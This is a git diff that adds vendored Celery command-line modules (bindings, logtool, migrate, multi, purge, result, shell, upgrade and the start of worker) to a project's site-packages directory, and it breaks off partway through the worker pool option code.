RabbitMQ the management plugin is required. + """ + + +@list_.command(cls=CeleryCommand) +@click.pass_context +def bindings(ctx): + """Inspect queue bindings.""" + # TODO: Consider using a table formatter for this command. 
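+    # The output below is three aligned columns -- queue name, exchange and
+    # routing key -- printed through the fmt() helper defined further down.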
+ app = ctx.obj.app + with app.connection() as conn: + app.amqp.TaskConsumer(conn).declare() + + try: + bindings = conn.manager.get_bindings() + except NotImplementedError: + raise click.UsageError('Your transport cannot list bindings.') + + def fmt(q, e, r): + ctx.obj.echo(f'{q:<28} {e:<28} {r}') + fmt('Queue', 'Exchange', 'Routing Key') + fmt('-' * 16, '-' * 16, '-' * 16) + for b in bindings: + fmt(b['destination'], b['source'], b['routing_key']) diff --git a/env/Lib/site-packages/celery/bin/logtool.py b/env/Lib/site-packages/celery/bin/logtool.py new file mode 100644 index 00000000..ae64c3e4 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/logtool.py @@ -0,0 +1,157 @@ +"""The ``celery logtool`` command.""" +import re +from collections import Counter +from fileinput import FileInput + +import click + +from celery.bin.base import CeleryCommand, handle_preload_options + +__all__ = ('logtool',) + +RE_LOG_START = re.compile(r'^\[\d\d\d\d\-\d\d-\d\d ') +RE_TASK_RECEIVED = re.compile(r'.+?\] Received') +RE_TASK_READY = re.compile(r'.+?\] Task') +RE_TASK_INFO = re.compile(r'.+?([\w\.]+)\[(.+?)\].+') +RE_TASK_RESULT = re.compile(r'.+?[\w\.]+\[.+?\] (.+)') + +REPORT_FORMAT = """ +Report +====== +Task total: {task[total]} +Task errors: {task[errors]} +Task success: {task[succeeded]} +Task completed: {task[completed]} +Tasks +===== +{task[types].format} +""" + + +class _task_counts(list): + + @property + def format(self): + return '\n'.join('{}: {}'.format(*i) for i in self) + + +def task_info(line): + m = RE_TASK_INFO.match(line) + return m.groups() + + +class Audit: + + def __init__(self, on_task_error=None, on_trace=None, on_debug=None): + self.ids = set() + self.names = {} + self.results = {} + self.ready = set() + self.task_types = Counter() + self.task_errors = 0 + self.on_task_error = on_task_error + self.on_trace = on_trace + self.on_debug = on_debug + self.prev_line = None + + def run(self, files): + for line in FileInput(files): + self.feed(line) + return self + + def task_received(self, line, task_name, task_id): + self.names[task_id] = task_name + self.ids.add(task_id) + self.task_types[task_name] += 1 + + def task_ready(self, line, task_name, task_id, result): + self.ready.add(task_id) + self.results[task_id] = result + if 'succeeded' not in result: + self.task_error(line, task_name, task_id, result) + + def task_error(self, line, task_name, task_id, result): + self.task_errors += 1 + if self.on_task_error: + self.on_task_error(line, task_name, task_id, result) + + def feed(self, line): + if RE_LOG_START.match(line): + if RE_TASK_RECEIVED.match(line): + task_name, task_id = task_info(line) + self.task_received(line, task_name, task_id) + elif RE_TASK_READY.match(line): + task_name, task_id = task_info(line) + result = RE_TASK_RESULT.match(line) + if result: + result, = result.groups() + self.task_ready(line, task_name, task_id, result) + else: + if self.on_debug: + self.on_debug(line) + self.prev_line = line + else: + if self.on_trace: + self.on_trace('\n'.join(filter(None, [self.prev_line, line]))) + self.prev_line = None + + def incomplete_tasks(self): + return self.ids ^ self.ready + + def report(self): + return { + 'task': { + 'types': _task_counts(self.task_types.most_common()), + 'total': len(self.ids), + 'errors': self.task_errors, + 'completed': len(self.ready), + 'succeeded': len(self.ready) - self.task_errors, + } + } + + +@click.group() +@click.pass_context +@handle_preload_options +def logtool(ctx): + """The ``celery logtool`` command.""" + + 
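+# The subcommands below each take one or more worker logfile paths and reuse the
+# Audit parser above: ``stats`` prints the aggregate report, ``traces`` echoes
+# multi-line entries such as tracebacks, ``errors`` echoes lines for tasks that
+# did not succeed, ``incomplete`` lists task ids that never reached a ready
+# state, and ``debug`` echoes records that are neither task-received nor
+# task-ready.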
+@logtool.command(cls=CeleryCommand) +@click.argument('files', nargs=-1) +@click.pass_context +def stats(ctx, files): + ctx.obj.echo(REPORT_FORMAT.format( + **Audit().run(files).report() + )) + + +@logtool.command(cls=CeleryCommand) +@click.argument('files', nargs=-1) +@click.pass_context +def traces(ctx, files): + Audit(on_trace=ctx.obj.echo).run(files) + + +@logtool.command(cls=CeleryCommand) +@click.argument('files', nargs=-1) +@click.pass_context +def errors(ctx, files): + Audit(on_task_error=lambda line, *_: ctx.obj.echo(line)).run(files) + + +@logtool.command(cls=CeleryCommand) +@click.argument('files', nargs=-1) +@click.pass_context +def incomplete(ctx, files): + audit = Audit() + audit.run(files) + for task_id in audit.incomplete_tasks(): + ctx.obj.echo(f'Did not complete: {task_id}') + + +@logtool.command(cls=CeleryCommand) +@click.argument('files', nargs=-1) +@click.pass_context +def debug(ctx, files): + Audit(on_debug=ctx.obj.echo).run(files) diff --git a/env/Lib/site-packages/celery/bin/migrate.py b/env/Lib/site-packages/celery/bin/migrate.py new file mode 100644 index 00000000..fc3c88b8 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/migrate.py @@ -0,0 +1,63 @@ +"""The ``celery migrate`` command, used to filter and move messages.""" +import click +from kombu import Connection + +from celery.bin.base import CeleryCommand, CeleryOption, handle_preload_options +from celery.contrib.migrate import migrate_tasks + + +@click.command(cls=CeleryCommand) +@click.argument('source') +@click.argument('destination') +@click.option('-n', + '--limit', + cls=CeleryOption, + type=int, + help_group='Migration Options', + help='Number of tasks to consume.') +@click.option('-t', + '--timeout', + cls=CeleryOption, + type=float, + help_group='Migration Options', + help='Timeout in seconds waiting for tasks.') +@click.option('-a', + '--ack-messages', + cls=CeleryOption, + is_flag=True, + help_group='Migration Options', + help='Ack messages from source broker.') +@click.option('-T', + '--tasks', + cls=CeleryOption, + help_group='Migration Options', + help='List of task names to filter on.') +@click.option('-Q', + '--queues', + cls=CeleryOption, + help_group='Migration Options', + help='List of queues to migrate.') +@click.option('-F', + '--forever', + cls=CeleryOption, + is_flag=True, + help_group='Migration Options', + help='Continually migrate tasks until killed.') +@click.pass_context +@handle_preload_options +def migrate(ctx, source, destination, **kwargs): + """Migrate tasks from one broker to another. + + Warning: + + This command is experimental, make sure you have a backup of + the tasks before you continue. + """ + # TODO: Use a progress bar + def on_migrate_task(state, body, message): + ctx.obj.echo(f"Migrating task {state.count}/{state.strtotal}: {body}") + + migrate_tasks(Connection(source), + Connection(destination), + callback=on_migrate_task, + **kwargs) diff --git a/env/Lib/site-packages/celery/bin/multi.py b/env/Lib/site-packages/celery/bin/multi.py new file mode 100644 index 00000000..360c3869 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/multi.py @@ -0,0 +1,480 @@ +"""Start multiple worker instances from the command-line. + +.. program:: celery multi + +Examples +======== + +.. code-block:: console + + $ # Single worker with explicit name and events enabled. + $ celery multi start Leslie -E + + $ # Pidfiles and logfiles are stored in the current directory + $ # by default. Use --pidfile and --logfile argument to change + $ # this. 
The abbreviation %n will be expanded to the current + $ # node name. + $ celery multi start Leslie -E --pidfile=/var/run/celery/%n.pid + --logfile=/var/log/celery/%n%I.log + + + $ # You need to add the same arguments when you restart, + $ # as these aren't persisted anywhere. + $ celery multi restart Leslie -E --pidfile=/var/run/celery/%n.pid + --logfile=/var/log/celery/%n%I.log + + $ # To stop the node, you need to specify the same pidfile. + $ celery multi stop Leslie --pidfile=/var/run/celery/%n.pid + + $ # 3 workers, with 3 processes each + $ celery multi start 3 -c 3 + celery worker -n celery1@myhost -c 3 + celery worker -n celery2@myhost -c 3 + celery worker -n celery3@myhost -c 3 + + $ # override name prefix when using range + $ celery multi start 3 --range-prefix=worker -c 3 + celery worker -n worker1@myhost -c 3 + celery worker -n worker2@myhost -c 3 + celery worker -n worker3@myhost -c 3 + + $ # start 3 named workers + $ celery multi start image video data -c 3 + celery worker -n image@myhost -c 3 + celery worker -n video@myhost -c 3 + celery worker -n data@myhost -c 3 + + $ # specify custom hostname + $ celery multi start 2 --hostname=worker.example.com -c 3 + celery worker -n celery1@worker.example.com -c 3 + celery worker -n celery2@worker.example.com -c 3 + + $ # specify fully qualified nodenames + $ celery multi start foo@worker.example.com bar@worker.example.com -c 3 + + $ # fully qualified nodenames but using the current hostname + $ celery multi start foo@%h bar@%h + + $ # Advanced example starting 10 workers in the background: + $ # * Three of the workers processes the images and video queue + $ # * Two of the workers processes the data queue with loglevel DEBUG + $ # * the rest processes the default' queue. + $ celery multi start 10 -l INFO -Q:1-3 images,video -Q:4,5 data + -Q default -L:4,5 DEBUG + + $ # You can show the commands necessary to start the workers with + $ # the 'show' command: + $ celery multi show 10 -l INFO -Q:1-3 images,video -Q:4,5 data + -Q default -L:4,5 DEBUG + + $ # Additional options are added to each celery worker's command, + $ # but you can also modify the options for ranges of, or specific workers + + $ # 3 workers: Two with 3 processes, and one with 10 processes. 
+ $ celery multi start 3 -c 3 -c:1 10 + celery worker -n celery1@myhost -c 10 + celery worker -n celery2@myhost -c 3 + celery worker -n celery3@myhost -c 3 + + $ # can also specify options for named workers + $ celery multi start image video data -c 3 -c:image 10 + celery worker -n image@myhost -c 10 + celery worker -n video@myhost -c 3 + celery worker -n data@myhost -c 3 + + $ # ranges and lists of workers in options is also allowed: + $ # (-c:1-3 can also be written as -c:1,2,3) + $ celery multi start 5 -c 3 -c:1-3 10 + celery worker -n celery1@myhost -c 10 + celery worker -n celery2@myhost -c 10 + celery worker -n celery3@myhost -c 10 + celery worker -n celery4@myhost -c 3 + celery worker -n celery5@myhost -c 3 + + $ # lists also works with named workers + $ celery multi start foo bar baz xuzzy -c 3 -c:foo,bar,baz 10 + celery worker -n foo@myhost -c 10 + celery worker -n bar@myhost -c 10 + celery worker -n baz@myhost -c 10 + celery worker -n xuzzy@myhost -c 3 +""" +import os +import signal +import sys +from functools import wraps + +import click +from kombu.utils.objects import cached_property + +from celery import VERSION_BANNER +from celery.apps.multi import Cluster, MultiParser, NamespacedOptionParser +from celery.bin.base import CeleryCommand, handle_preload_options +from celery.platforms import EX_FAILURE, EX_OK, signals +from celery.utils import term +from celery.utils.text import pluralize + +__all__ = ('MultiTool',) + +USAGE = """\ +usage: {prog_name} start [worker options] + {prog_name} stop [-SIG (default: -TERM)] + {prog_name} restart [-SIG] [worker options] + {prog_name} kill + + {prog_name} show [worker options] + {prog_name} get hostname [-qv] [worker options] + {prog_name} names + {prog_name} expand template + {prog_name} help + +additional options (must appear after command name): + + * --nosplash: Don't display program info. + * --quiet: Don't show as much output. + * --verbose: Show more output. + * --no-color: Don't display colors. +""" + + +def main(): + sys.exit(MultiTool().execute_from_commandline(sys.argv)) + + +def splash(fun): + + @wraps(fun) + def _inner(self, *args, **kwargs): + self.splash() + return fun(self, *args, **kwargs) + return _inner + + +def using_cluster(fun): + + @wraps(fun) + def _inner(self, *argv, **kwargs): + return fun(self, self.cluster_from_argv(argv), **kwargs) + return _inner + + +def using_cluster_and_sig(fun): + + @wraps(fun) + def _inner(self, *argv, **kwargs): + p, cluster = self._cluster_from_argv(argv) + sig = self._find_sig_argument(p) + return fun(self, cluster, sig, **kwargs) + return _inner + + +class TermLogger: + + splash_text = 'celery multi v{version}' + splash_context = {'version': VERSION_BANNER} + + #: Final exit code. 
+ retcode = 0 + + def setup_terminal(self, stdout, stderr, + nosplash=False, quiet=False, verbose=False, + no_color=False, **kwargs): + self.stdout = stdout or sys.stdout + self.stderr = stderr or sys.stderr + self.nosplash = nosplash + self.quiet = quiet + self.verbose = verbose + self.no_color = no_color + + def ok(self, m, newline=True, file=None): + self.say(m, newline=newline, file=file) + return EX_OK + + def say(self, m, newline=True, file=None): + print(m, file=file or self.stdout, end='\n' if newline else '') + + def carp(self, m, newline=True, file=None): + return self.say(m, newline, file or self.stderr) + + def error(self, msg=None): + if msg: + self.carp(msg) + self.usage() + return EX_FAILURE + + def info(self, msg, newline=True): + if self.verbose: + self.note(msg, newline=newline) + + def note(self, msg, newline=True): + if not self.quiet: + self.say(str(msg), newline=newline) + + @splash + def usage(self): + self.say(USAGE.format(prog_name=self.prog_name)) + + def splash(self): + if not self.nosplash: + self.note(self.colored.cyan( + self.splash_text.format(**self.splash_context))) + + @cached_property + def colored(self): + return term.colored(enabled=not self.no_color) + + +class MultiTool(TermLogger): + """The ``celery multi`` program.""" + + MultiParser = MultiParser + OptionParser = NamespacedOptionParser + + reserved_options = [ + ('--nosplash', 'nosplash'), + ('--quiet', 'quiet'), + ('-q', 'quiet'), + ('--verbose', 'verbose'), + ('--no-color', 'no_color'), + ] + + def __init__(self, env=None, cmd=None, + fh=None, stdout=None, stderr=None, **kwargs): + # fh is an old alias to stdout. + self.env = env + self.cmd = cmd + self.setup_terminal(stdout or fh, stderr, **kwargs) + self.fh = self.stdout + self.prog_name = 'celery multi' + self.commands = { + 'start': self.start, + 'show': self.show, + 'stop': self.stop, + 'stopwait': self.stopwait, + 'stop_verify': self.stopwait, # compat alias + 'restart': self.restart, + 'kill': self.kill, + 'names': self.names, + 'expand': self.expand, + 'get': self.get, + 'help': self.help, + } + + def execute_from_commandline(self, argv, cmd=None): + # Reserve the --nosplash|--quiet|-q/--verbose options. + argv = self._handle_reserved_options(argv) + self.cmd = cmd if cmd is not None else self.cmd + self.prog_name = os.path.basename(argv.pop(0)) + + if not self.validate_arguments(argv): + return self.error() + + return self.call_command(argv[0], argv[1:]) + + def validate_arguments(self, argv): + return argv and argv[0][0] != '-' + + def call_command(self, command, argv): + try: + return self.commands[command](*argv) or EX_OK + except KeyError: + return self.error(f'Invalid command: {command}') + + def _handle_reserved_options(self, argv): + argv = list(argv) # don't modify callers argv. 
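+        # Pop each reserved flag (--nosplash, --quiet/-q, --verbose, --no-color)
+        # out of argv and set the matching attribute on this instance, so only
+        # the multi sub-command and its worker arguments remain.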
+ for arg, attr in self.reserved_options: + if arg in argv: + setattr(self, attr, bool(argv.pop(argv.index(arg)))) + return argv + + @splash + @using_cluster + def start(self, cluster): + self.note('> Starting nodes...') + return int(any(cluster.start())) + + @splash + @using_cluster_and_sig + def stop(self, cluster, sig, **kwargs): + return cluster.stop(sig=sig, **kwargs) + + @splash + @using_cluster_and_sig + def stopwait(self, cluster, sig, **kwargs): + return cluster.stopwait(sig=sig, **kwargs) + stop_verify = stopwait # compat + + @splash + @using_cluster_and_sig + def restart(self, cluster, sig, **kwargs): + return int(any(cluster.restart(sig=sig, **kwargs))) + + @using_cluster + def names(self, cluster): + self.say('\n'.join(n.name for n in cluster)) + + def get(self, wanted, *argv): + try: + node = self.cluster_from_argv(argv).find(wanted) + except KeyError: + return EX_FAILURE + else: + return self.ok(' '.join(node.argv)) + + @using_cluster + def show(self, cluster): + return self.ok('\n'.join( + ' '.join(node.argv_with_executable) + for node in cluster + )) + + @splash + @using_cluster + def kill(self, cluster): + return cluster.kill() + + def expand(self, template, *argv): + return self.ok('\n'.join( + node.expander(template) + for node in self.cluster_from_argv(argv) + )) + + def help(self, *argv): + self.say(__doc__) + + def _find_sig_argument(self, p, default=signal.SIGTERM): + args = p.args[len(p.values):] + for arg in reversed(args): + if len(arg) == 2 and arg[0] == '-': + try: + return int(arg[1]) + except ValueError: + pass + if arg[0] == '-': + try: + return signals.signum(arg[1:]) + except (AttributeError, TypeError): + pass + return default + + def _nodes_from_argv(self, argv, cmd=None): + cmd = cmd if cmd is not None else self.cmd + p = self.OptionParser(argv) + p.parse() + return p, self.MultiParser(cmd=cmd).parse(p) + + def cluster_from_argv(self, argv, cmd=None): + _, cluster = self._cluster_from_argv(argv, cmd=cmd) + return cluster + + def _cluster_from_argv(self, argv, cmd=None): + p, nodes = self._nodes_from_argv(argv, cmd=cmd) + return p, self.Cluster(list(nodes), cmd=cmd) + + def Cluster(self, nodes, cmd=None): + return Cluster( + nodes, + cmd=cmd, + env=self.env, + on_stopping_preamble=self.on_stopping_preamble, + on_send_signal=self.on_send_signal, + on_still_waiting_for=self.on_still_waiting_for, + on_still_waiting_progress=self.on_still_waiting_progress, + on_still_waiting_end=self.on_still_waiting_end, + on_node_start=self.on_node_start, + on_node_restart=self.on_node_restart, + on_node_shutdown_ok=self.on_node_shutdown_ok, + on_node_status=self.on_node_status, + on_node_signal_dead=self.on_node_signal_dead, + on_node_signal=self.on_node_signal, + on_node_down=self.on_node_down, + on_child_spawn=self.on_child_spawn, + on_child_signalled=self.on_child_signalled, + on_child_failure=self.on_child_failure, + ) + + def on_stopping_preamble(self, nodes): + self.note(self.colored.blue('> Stopping nodes...')) + + def on_send_signal(self, node, sig): + self.note('\t> {0.name}: {1} -> {0.pid}'.format(node, sig)) + + def on_still_waiting_for(self, nodes): + num_left = len(nodes) + if num_left: + self.note(self.colored.blue( + '> Waiting for {} {} -> {}...'.format( + num_left, pluralize(num_left, 'node'), + ', '.join(str(node.pid) for node in nodes)), + ), newline=False) + + def on_still_waiting_progress(self, nodes): + self.note('.', newline=False) + + def on_still_waiting_end(self): + self.note('') + + def on_node_signal_dead(self, node): + self.note( + 'Could not 
signal {0.name} ({0.pid}): No such process'.format( + node)) + + def on_node_start(self, node): + self.note(f'\t> {node.name}: ', newline=False) + + def on_node_restart(self, node): + self.note(self.colored.blue( + f'> Restarting node {node.name}: '), newline=False) + + def on_node_down(self, node): + self.note(f'> {node.name}: {self.DOWN}') + + def on_node_shutdown_ok(self, node): + self.note(f'\n\t> {node.name}: {self.OK}') + + def on_node_status(self, node, retval): + self.note(retval and self.FAILED or self.OK) + + def on_node_signal(self, node, sig): + self.note('Sending {sig} to node {0.name} ({0.pid})'.format( + node, sig=sig)) + + def on_child_spawn(self, node, argstr, env): + self.info(f' {argstr}') + + def on_child_signalled(self, node, signum): + self.note(f'* Child was terminated by signal {signum}') + + def on_child_failure(self, node, retcode): + self.note(f'* Child terminated with exit code {retcode}') + + @cached_property + def OK(self): + return str(self.colored.green('OK')) + + @cached_property + def FAILED(self): + return str(self.colored.red('FAILED')) + + @cached_property + def DOWN(self): + return str(self.colored.magenta('DOWN')) + + +@click.command( + cls=CeleryCommand, + context_settings={ + 'allow_extra_args': True, + 'ignore_unknown_options': True + } +) +@click.pass_context +@handle_preload_options +def multi(ctx, **kwargs): + """Start multiple worker instances.""" + cmd = MultiTool(quiet=ctx.obj.quiet, no_color=ctx.obj.no_color) + # In 4.x, celery multi ignores the global --app option. + # Since in 5.0 the --app option is global only we + # rearrange the arguments so that the MultiTool will parse them correctly. + args = sys.argv[1:] + args = args[args.index('multi'):] + args[:args.index('multi')] + return cmd.execute_from_commandline(args) diff --git a/env/Lib/site-packages/celery/bin/purge.py b/env/Lib/site-packages/celery/bin/purge.py new file mode 100644 index 00000000..cfb6caa9 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/purge.py @@ -0,0 +1,70 @@ +"""The ``celery purge`` program, used to delete messages from queues.""" +import click + +from celery.bin.base import COMMA_SEPARATED_LIST, CeleryCommand, CeleryOption, handle_preload_options +from celery.utils import text + + +@click.command(cls=CeleryCommand, context_settings={ + 'allow_extra_args': True +}) +@click.option('-f', + '--force', + cls=CeleryOption, + is_flag=True, + help_group='Purging Options', + help="Don't prompt for verification.") +@click.option('-Q', + '--queues', + cls=CeleryOption, + type=COMMA_SEPARATED_LIST, + help_group='Purging Options', + help="Comma separated list of queue names to purge.") +@click.option('-X', + '--exclude-queues', + cls=CeleryOption, + type=COMMA_SEPARATED_LIST, + help_group='Purging Options', + help="Comma separated list of queues names not to purge.") +@click.pass_context +@handle_preload_options +def purge(ctx, force, queues, exclude_queues, **kwargs): + """Erase all messages from all known task queues. + + Warning: + + There's no undo operation for this command. 
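+
+    Example (illustrative; ``proj`` and the queue names are placeholders)::
+
+        celery -A proj purge -f -Q celery,images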
+ """ + app = ctx.obj.app + queues = set(queues or app.amqp.queues.keys()) + exclude_queues = set(exclude_queues or []) + names = queues - exclude_queues + qnum = len(names) + + if names: + queues_headline = text.pluralize(qnum, 'queue') + if not force: + queue_names = ', '.join(sorted(names)) + click.confirm(f"{ctx.obj.style('WARNING', fg='red')}:" + "This will remove all tasks from " + f"{queues_headline}: {queue_names}.\n" + " There is no undo for this operation!\n\n" + "(to skip this prompt use the -f option)\n" + "Are you sure you want to delete all tasks?", + abort=True) + + def _purge(conn, queue): + try: + return conn.default_channel.queue_purge(queue) or 0 + except conn.channel_errors: + return 0 + + with app.connection_for_write() as conn: + messages = sum(_purge(conn, queue) for queue in names) + + if messages: + messages_headline = text.pluralize(messages, 'message') + ctx.obj.echo(f"Purged {messages} {messages_headline} from " + f"{qnum} known task {queues_headline}.") + else: + ctx.obj.echo(f"No messages purged from {qnum} {queues_headline}.") diff --git a/env/Lib/site-packages/celery/bin/result.py b/env/Lib/site-packages/celery/bin/result.py new file mode 100644 index 00000000..615ee2eb --- /dev/null +++ b/env/Lib/site-packages/celery/bin/result.py @@ -0,0 +1,30 @@ +"""The ``celery result`` program, used to inspect task results.""" +import click + +from celery.bin.base import CeleryCommand, CeleryOption, handle_preload_options + + +@click.command(cls=CeleryCommand) +@click.argument('task_id') +@click.option('-t', + '--task', + cls=CeleryOption, + help_group='Result Options', + help="Name of task (if custom backend).") +@click.option('--traceback', + cls=CeleryOption, + is_flag=True, + help_group='Result Options', + help="Show traceback instead.") +@click.pass_context +@handle_preload_options +def result(ctx, task_id, task, traceback): + """Print the return value for a given task id.""" + app = ctx.obj.app + + result_cls = app.tasks[task].AsyncResult if task else app.AsyncResult + task_result = result_cls(task_id) + value = task_result.traceback if traceback else task_result.get() + + # TODO: Prettify result + ctx.obj.echo(value) diff --git a/env/Lib/site-packages/celery/bin/shell.py b/env/Lib/site-packages/celery/bin/shell.py new file mode 100644 index 00000000..6c94a008 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/shell.py @@ -0,0 +1,173 @@ +"""The ``celery shell`` program, used to start a REPL.""" + +import os +import sys +from importlib import import_module + +import click + +from celery.bin.base import CeleryCommand, CeleryOption, handle_preload_options + + +def _invoke_fallback_shell(locals): + import code + try: + import readline + except ImportError: + pass + else: + import rlcompleter + readline.set_completer( + rlcompleter.Completer(locals).complete) + readline.parse_and_bind('tab:complete') + code.interact(local=locals) + + +def _invoke_bpython_shell(locals): + import bpython + bpython.embed(locals) + + +def _invoke_ipython_shell(locals): + for ip in (_ipython, _ipython_pre_10, + _ipython_terminal, _ipython_010, + _no_ipython): + try: + return ip(locals) + except ImportError: + pass + + +def _ipython(locals): + from IPython import start_ipython + start_ipython(argv=[], user_ns=locals) + + +def _ipython_pre_10(locals): # pragma: no cover + from IPython.frontend.terminal.ipapp import TerminalIPythonApp + app = TerminalIPythonApp.instance() + app.initialize(argv=[]) + app.shell.user_ns.update(locals) + app.start() + + +def _ipython_terminal(locals): # pragma: 
no cover + from IPython.terminal import embed + embed.TerminalInteractiveShell(user_ns=locals).mainloop() + + +def _ipython_010(locals): # pragma: no cover + from IPython.Shell import IPShell + IPShell(argv=[], user_ns=locals).mainloop() + + +def _no_ipython(self): # pragma: no cover + raise ImportError('no suitable ipython found') + + +def _invoke_default_shell(locals): + try: + import IPython # noqa + except ImportError: + try: + import bpython # noqa + except ImportError: + _invoke_fallback_shell(locals) + else: + _invoke_bpython_shell(locals) + else: + _invoke_ipython_shell(locals) + + +@click.command(cls=CeleryCommand, context_settings={ + 'allow_extra_args': True +}) +@click.option('-I', + '--ipython', + is_flag=True, + cls=CeleryOption, + help_group="Shell Options", + help="Force IPython.") +@click.option('-B', + '--bpython', + is_flag=True, + cls=CeleryOption, + help_group="Shell Options", + help="Force bpython.") +@click.option('--python', + is_flag=True, + cls=CeleryOption, + help_group="Shell Options", + help="Force default Python shell.") +@click.option('-T', + '--without-tasks', + is_flag=True, + cls=CeleryOption, + help_group="Shell Options", + help="Don't add tasks to locals.") +@click.option('--eventlet', + is_flag=True, + cls=CeleryOption, + help_group="Shell Options", + help="Use eventlet.") +@click.option('--gevent', + is_flag=True, + cls=CeleryOption, + help_group="Shell Options", + help="Use gevent.") +@click.pass_context +@handle_preload_options +def shell(ctx, ipython=False, bpython=False, + python=False, without_tasks=False, eventlet=False, + gevent=False, **kwargs): + """Start shell session with convenient access to celery symbols. + + The following symbols will be added to the main globals: + - ``celery``: the current application. + - ``chord``, ``group``, ``chain``, ``chunks``, + ``xmap``, ``xstarmap`` ``subtask``, ``Task`` + - all registered tasks. 
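+
+    Example (illustrative; ``proj`` is a placeholder application name)::
+
+        celery -A proj shell --ipython --without-tasks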
+ """ + sys.path.insert(0, os.getcwd()) + if eventlet: + import_module('celery.concurrency.eventlet') + if gevent: + import_module('celery.concurrency.gevent') + import celery + app = ctx.obj.app + app.loader.import_default_modules() + + # pylint: disable=attribute-defined-outside-init + locals = { + 'app': app, + 'celery': app, + 'Task': celery.Task, + 'chord': celery.chord, + 'group': celery.group, + 'chain': celery.chain, + 'chunks': celery.chunks, + 'xmap': celery.xmap, + 'xstarmap': celery.xstarmap, + 'subtask': celery.subtask, + 'signature': celery.signature, + } + + if not without_tasks: + locals.update({ + task.__name__: task for task in app.tasks.values() + if not task.name.startswith('celery.') + }) + + if python: + _invoke_fallback_shell(locals) + elif bpython: + try: + _invoke_bpython_shell(locals) + except ImportError: + ctx.obj.echo(f'{ctx.obj.ERROR}: bpython is not installed') + elif ipython: + try: + _invoke_ipython_shell(locals) + except ImportError as e: + ctx.obj.echo(f'{ctx.obj.ERROR}: {e}') + _invoke_default_shell(locals) diff --git a/env/Lib/site-packages/celery/bin/upgrade.py b/env/Lib/site-packages/celery/bin/upgrade.py new file mode 100644 index 00000000..bbfdb044 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/upgrade.py @@ -0,0 +1,91 @@ +"""The ``celery upgrade`` command, used to upgrade from previous versions.""" +import codecs +import sys + +import click + +from celery.app import defaults +from celery.bin.base import CeleryCommand, CeleryOption, handle_preload_options +from celery.utils.functional import pass1 + + +@click.group() +@click.pass_context +@handle_preload_options +def upgrade(ctx): + """Perform upgrade between versions.""" + + +def _slurp(filename): + # TODO: Handle case when file does not exist + with codecs.open(filename, 'r', 'utf-8') as read_fh: + return [line for line in read_fh] + + +def _compat_key(key, namespace='CELERY'): + key = key.upper() + if not key.startswith(namespace): + key = '_'.join([namespace, key]) + return key + + +def _backup(filename, suffix='.orig'): + lines = [] + backup_filename = ''.join([filename, suffix]) + print(f'writing backup to {backup_filename}...', + file=sys.stderr) + with codecs.open(filename, 'r', 'utf-8') as read_fh: + with codecs.open(backup_filename, 'w', 'utf-8') as backup_fh: + for line in read_fh: + backup_fh.write(line) + lines.append(line) + return lines + + +def _to_new_key(line, keyfilter=pass1, source=defaults._TO_NEW_KEY): + # sort by length to avoid, for example, broker_transport overriding + # broker_transport_options. + for old_key in reversed(sorted(source, key=lambda x: len(x))): + new_line = line.replace(old_key, keyfilter(source[old_key])) + if line != new_line and 'CELERY_CELERY' not in new_line: + return 1, new_line # only one match per line. 
+ return 0, line + + +@upgrade.command(cls=CeleryCommand) +@click.argument('filename') +@click.option('--django', + cls=CeleryOption, + is_flag=True, + help_group='Upgrading Options', + help='Upgrade Django project.') +@click.option('--compat', + cls=CeleryOption, + is_flag=True, + help_group='Upgrading Options', + help='Maintain backwards compatibility.') +@click.option('--no-backup', + cls=CeleryOption, + is_flag=True, + help_group='Upgrading Options', + help="Don't backup original files.") +def settings(filename, django, compat, no_backup): + """Migrate settings from Celery 3.x to Celery 4.x.""" + lines = _slurp(filename) + keyfilter = _compat_key if django or compat else pass1 + print(f'processing {filename}...', file=sys.stderr) + # gives list of tuples: ``(did_change, line_contents)`` + new_lines = [ + _to_new_key(line, keyfilter) for line in lines + ] + if any(n[0] for n in new_lines): # did have changes + if not no_backup: + _backup(filename) + with codecs.open(filename, 'w', 'utf-8') as write_fh: + for _, line in new_lines: + write_fh.write(line) + print('Changes to your setting have been made!', + file=sys.stdout) + else: + print('Does not seem to require any changes :-)', + file=sys.stdout) diff --git a/env/Lib/site-packages/celery/bin/worker.py b/env/Lib/site-packages/celery/bin/worker.py new file mode 100644 index 00000000..0cc3d666 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/worker.py @@ -0,0 +1,360 @@ +"""Program used to start a Celery worker instance.""" + +import os +import sys + +import click +from click import ParamType +from click.types import StringParamType + +from celery import concurrency +from celery.bin.base import (COMMA_SEPARATED_LIST, LOG_LEVEL, CeleryDaemonCommand, CeleryOption, + handle_preload_options) +from celery.concurrency.base import BasePool +from celery.exceptions import SecurityError +from celery.platforms import EX_FAILURE, EX_OK, detached, maybe_drop_privileges +from celery.utils.log import get_logger +from celery.utils.nodenames import default_nodename, host_format, node_format + +logger = get_logger(__name__) + + +class CeleryBeat(ParamType): + """Celery Beat flag.""" + + name = "beat" + + def convert(self, value, param, ctx): + if ctx.obj.app.IS_WINDOWS and value: + self.fail('-B option does not work on Windows. ' + 'Please run celery beat as a separate service.') + + return value + + +class WorkersPool(click.Choice): + """Workers pool option.""" + + name = "pool" + + def __init__(self): + """Initialize the workers pool option with the relevant choices.""" + super().__init__(concurrency.get_available_pool_names()) + + def convert(self, value, param, ctx): + # Pools like eventlet/gevent needs to patch libs as early + # as possible. + if isinstance(value, type) and issubclass(value, BasePool): + return value + + value = super().convert(value, param, ctx) + worker_pool = ctx.obj.app.conf.worker_pool + if value == 'prefork' and worker_pool: + # If we got the default pool through the CLI + # we need to check if the worker pool was configured. + # If the worker pool was configured, we shouldn't use the default. 
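+            # i.e. a 'prefork' value (the CLI default) defers to the app's
+            # configured worker_pool; any other pool name given on the command
+            # line is resolved directly in the else branch below.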
